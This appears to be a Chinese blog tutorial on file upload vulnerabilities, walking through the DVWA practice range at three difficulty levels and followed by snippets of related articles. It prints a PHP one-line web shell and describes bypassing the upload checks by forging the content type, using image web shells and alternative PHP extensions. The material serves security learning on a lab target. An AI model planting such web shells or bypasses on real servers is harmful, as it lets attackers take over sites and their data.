web文件上传漏洞

最新推荐文章于 2025-05-06 13:55:58 发布
最新推荐文章于 2025-05-06 13:55:58 发布
阅读量383 收藏
点赞数
分类专栏: web基础漏洞 文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_62274649/article/details/127901346
版权

概念:

“这个漏洞在DVBBS6.0时代被黑客们利用的最为猖獗,利用上传漏洞可以直接得到WEBSHELL,危害等级超级高,入侵中上传漏洞也是常见的漏洞。

导致该漏洞的原因在于代码作者没有对访客提交的数据进行检验或者过滤不严,可以直接提交修改过的数据绕过扩展名的检验” :这是百度百科对文件上传漏洞的概念。 这个概念即使萌新也是比较好理解的。大家可以看下面这个图。

用大白话来说就是一个网站有一个让人上传头像(或者其他)的功能,但是不法分子,也就是我们所说的黑客上传了木马(webshell)然后获得了对该站点的权限。 存在文件上传功能的地方都有可能存在文件上传漏洞,比如相册头像上传,视频、照片分享。论坛发帖和邮箱等可以上传附件的地方也是上传漏阔的高危地带,另外像文件管理器这样的功能也有可能被攻击者所利用。这是非常可怕的,所以网站要做好过滤,防止黑客利用这个漏洞进行犯罪活动。

DVWA

下面我们开始用dvwa的靶场来实战一下,我是用服务器在docker搭建的靶场,不会的可以百度一下dvwa靶场的搭建。在buu的basic里也有现成的靶场。

low

我试了一下,可以上传png图片,查看一下源码

<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!

这个过程没有作任何的过滤,我们就可以直接上传一句话木马

 <?php @eval($_POST['attack']);?>

上传以后就显示成功上传

然后用蚁剑连接一下,就获得了对该服务器的权限

medium

我们再上传一下一句话木马文件,发现,上传失败。

并提示我们,只能上传jpg文件和png文件,可以看到,这里有个js检测。

 // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

,那么我们该怎么绕过呢。

因为这个是客户端检测,所以我们打开burpsuite,抓个包

这个是菜鸟教程对content type的解释,清晰明了。

把content-type改成:image/jpeg.再一看,已经成功上传了。

再用蚁剑,成功连接。拿到了对服务器的权限。

high

我们先看一下源码,发现大同小异,只有一处不同。

这里有两个函数:substr strrpos

substr函数是返回字符串的一部分,比如上面这个栗子,返回字符串第六个字节以后的内容。

strpos() 函数查找字符串在另一字符串中第一次出现的位置。

这一句就是返回小数点之后的内容必须为jpeg或者png。因此上一关的方法已经不适用了。需要用到图片马。

jpg/b这个b就是byte,是字节的意思。因为照片是二进制文件。php/a后面是a是因为php文件是Ascii文件。

上传一下,成功。连接蚁剑,ok。

WEB安全之文件上传漏洞
qq_56158055的博客
01-15 1980
文件上传漏洞原理 由于开发人员对用户上传文件的部分处理的不够严谨,从而导致用户可以上传恶意文件,并执行这种恶意文件,从而获取执行服务器的权限。 漏洞的危害 获取服务器webshell权限 任意查看、修改、删除、下载对方文件 查看数据库信息 执行命令 挂黑页、木马等 漏洞发现 上传头像的位置 敏感身份认证的位置(身份证等各种证件的照片上传处) 订单反馈的位置(上传照片) 各种能上场文件的地方 注意事项 可解析php的后缀:php,php2,php3,php4,php..
WEB入门——文件上传漏洞
HasntStartIsOver的博客
06-04 1万+
文件上传漏洞服务端代码未对客户端上传的文件进行严格的验证,导致漏洞。如果.php后缀被限制,可以尝试:.php3、php4、.PHp(修改大小写)、.phtml、.pht等后缀,WebShell的内容一样。这两个配置的意思就是:我们指定一个文件,那么该文件就会被包含在要执行的php文件中(如index.php)。如果客户端JS脚本有加限制(例如上传图片,JS脚本显示了只能上传图片格式,不能上传.php后缀的文件)。1、上传的文件是web脚本语言,服务器的web容器解释并执行了用户上传的脚本,脚本语言执行。
web文件上传漏洞&upload-labs
weixin_47813861的博客
08-03 346
以upload-labs为主线,学习文件上传漏洞,期间穿插一些相关漏洞知识 1、lab-1 涉及到的是前端过滤相关类型文件。 代码允许通过的是.jpg .png .gif文件。前端的绕过方法很简单: 1、直接关闭或者修改js 在浏览器中禁用js后直接上传 右键复制图片地址后浏览,显示上传php内容。 2、更改数据包来实现绕过 更改上传文件名的后缀为jpg(前端过滤的话,直接上传php格式是无法抓到包的) 更改数据包 成功。 &Nginx 文件名逻辑漏洞(CVE-2013-4547)
DVWA靶场-----FIle Upload(文件上传
m0_65712192的博客
11-14 4424
DVWA靶场-----FIle Upload(文件上传
Web安全之—File Upload基于dvwa的一句话木马注入
weixin_41657031的博客
07-16 1044
LOW Level 代码: <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $...
web安全技术-实验六、文件上传漏洞.doc
08-20
文件上传漏洞】是Web应用安全领域中的一个重要概念,它主要出现在允许用户上传文件到服务器的应用程序中。当系统没有正确地验证或过滤上传的文件类型时,攻击者可以利用这个漏洞上传恶意代码,例如病毒、木马或者...
N1Book-第二章Web进阶-Web文件上传漏洞
weixin_40872714的博客
03-31 4631
N1Book-第二章Web进阶-Web文件上传漏洞 以下内容转自 https://www.icode9.com/content-4-874265.html <?php header("Content-Type:text/html; charset=utf-8"); // 每5分钟会清除一次目录下上传的文件 //会包含文件pclzip.lib.php,感觉这个php里面是有一些针对zip包进行解压等的操作的 require_once('pclzip.lib.php'); //要是没上传文件,就输出
web文件上传漏洞的简单操作示范
01-08
这就是吉师大一因为期末论文写的一篇web简介,内容大部分很水,我也没学到那么多,慢慢磨吧
关于在flask框架上进行web文件上传漏洞测试的杂记
qq_45071353的博客
11-25 1527
关于在flask框架上进行web文件上传漏洞测试的杂记简单说明简单测试 昨天不是刚把服务器给部署好了嘛,其中针对sql注入,xss以及文件上传做了一定程度的防范,可是不知道防护效果如何,今天就花了几个小时对文件上传做了些简单的测试。 简单说明 首先来说下我后端针对文件上传做的基本防护吧。 第一就是针对文件名进行处理,在后端进行文件后缀名截取,只允许png,jpg,jpeg格式的图片上传,对不满足条件的文件进行删除并在前端输出相关提示。当然这个工作其实在前端也可以做。 第二就是用python的imghdr.w
web渗透之文件上传漏洞
qinshuoyang1的博客
07-19 4078
文件上传漏洞可以说是日常渗透测试中用得最多的一个漏洞,用它获得服务器权限最快最直接。在Web程序中,经常需要用到文件上传的功能。如用户或者管理员上传图片,或者其它文件。如果没有限制上传类型或者限制不严格被绕过,就有可能造成文件上传漏洞。如果上传了可执行文件或者网页脚本,就会导致网站被控制甚至服务器沦陷。,复杂一点的情况是配合 Web Server的解析漏洞来获取控制权或结合文件包含漏洞。......
web安全-文件上传漏洞-图片马制作-相关php函讲解-upload靶场通关详细教学(3)
ran的博客
01-30 7205
getimagesize() 函将测定任何 GIF,JPG,PNG,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型及图片高度与宽度。的知识,比如我们平时在进行文件上传时,在我们上传文件后,网站会对图片进行二次处理(格式、尺寸、保存、删除要求等),服务器会把里面的内容进行替换更新,处理完成后,根据我们原有的图片生成一个新的图片(标准化)并放到网站对应的标签进行显示。
web漏洞——文件上传漏洞(upload-labs)
net的博客
02-25 3669
由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。文件上传漏洞本身就是一个危害巨大的漏洞WebShell更是将这种漏洞的利用无限扩大。大多的。
文件上传----实战篇
bylfsj的博客
09-30 645
第1关 a.源码 b.思路 前端js检测,直接用插件禁了js。 第2关 a.源码 $is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { if (($_FILES['upload_file']['type'] == 'image/jpeg...
c获取函地址_记一次从源代码泄漏到后台获取webshell的过程
weixin_39616477的博客
11-25 324
0x01 前言在一次授权测试中对某网站进行测试时,marry大佬发现了一个网站的备份文件,里面有网站源代码数据库备份等。根据网站信息和代码都可以发现该系统采用的是微擎cms,利用数据库备份中的用户信息解密后可以登录系统,接下来要看是否可以获取webshell。0x02 WEBSHELL获取的尝试有了数据库备份文件,然后找一下是否有用户的信息,能否登录系统。1.登录后台解压备份文件可以从...
WEBSHELL姿势之文件上传漏洞(渗透实验)
热门推荐
forbidd3n,keep going
10-14 1万+
实验场景  某互联网公司授权你对其网络安全进行模拟黑客攻击渗透。在XX年XX月XX 日至XX年XX月XX日,对某核心服务器进行入侵测试,据了解,该web服务器(10.1.1.178)上 C:\consle存储有银行的关键敏感数据。 目标任务       请以下列任务为目标进行入侵渗透 :       1、利用网站漏洞获取该服务器shell;(网页关入侵--铜牌任务)
Web安全漏洞——文件上传(fileupload)
weixin_42095265的博客
11-20 2348
1.原理 文件上传漏洞是指用户上传了一个可执行脚本文件,并通过此文件获得了执行服务器端命令的能力。要完成这个攻击,要满足一下几个条件: 上传的文件能够被Web容器解释执行,所以文件上传后所在的目录要是Web容器所覆盖到的路径。 用户能够从Web上访问这个文件。 用户上传的文件如果被安全检查、格式化、图片压缩等功能改变了内容,则可能导致攻击不成功 文件包含漏洞(file include)(有次面...
Web安全】文件上传漏洞
Rei的博客
08-25 799
前言 上网过程中,我们经常会将一些如图片、压缩包之类的文件上传至文件服务器进行保存。而文件上传攻击指的是攻击者利用一些站点没有对文件的类型做很好的校验,上传了可执行的文件或脚本,并且通过脚本获得服务器上相应的权限,或者是通过诱导外部用户访问下载上传的病毒或木马,达到攻击的目的。 除了上述危害,我们还需防止用户将文件服务器当成免费的网盘无限制上传文件。 解决方案 文件类型白名单校验(仅允许部...
基于WebUI的深度学习模型部署与应用实践
最新发布
Programming Talk
05-06 101
随着深度学习技术的快速发展,如何将训练好的模型快速部署并提供友好的用户交互界面成为许多AI项目落地的关键。WebUI(Web User Interface)作为一种轻量级、跨平台的解决方案,正被广泛应用于各类AI模型的部署场景。本文将详细介绍基于Python生态构建WebUI的技术方案,包含完整的代码实现,并探讨在实际项目中的应用实践。本文详细介绍了基于Gradio构建深度学习WebUI的完整流程,从基础实现到生产部署,涵盖了实际项目中的关键技术和优化方案。二、基于Gradio的模型部署实践。
web文件上传漏洞php文件
02-20
### PHP Web 文件上传漏洞安全性解决方案 #### 一、文件类型验证不足引发的安全风险 当处理文件上传功能时,如果仅依赖于客户端提交数据而不做服务器端校验,则可能导致恶意用户绕过前端限制上传危险文件。例如,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

R3ality

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值